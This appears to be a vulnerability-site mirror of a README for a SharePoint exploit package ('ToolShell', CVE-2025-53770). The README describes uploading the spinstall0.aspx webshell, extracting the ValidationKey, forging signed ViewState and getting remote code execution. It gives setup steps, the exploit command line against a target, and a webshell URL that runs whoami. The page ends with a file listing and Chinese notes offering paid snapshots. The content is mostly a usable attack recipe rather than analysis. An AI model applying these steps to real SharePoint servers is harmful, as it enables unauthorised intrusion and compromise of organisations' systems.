关联漏洞
介绍
# ToolShell → CVE‑2025‑53770 Exploit PoC
This package allows:
1. **Upload webshell** to SharePoint
2. **Extract ValidationKey**
3. **Generate signed ViewState**
4. **RCE via reverse/bind shell**
---
## 🔧 Setup
```bash
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
```
## 🤖 Running
Upload the webshell
From a SharePoint page you can access the page source .Just go to view source tab and From there if available you would get following, which can copy:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (any current __VIEWSTATE for context)
```bash
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
```
This uploads spinstall0.aspx.
Check:
https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami
文件快照
[4.0K] /data/pocs/445798089e9839045ff3d24ef98661a383e17399
├── [ 890] README.md
├── [ 605] spinstall0.aspx
└── [2.0K] toolshell_exploit.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。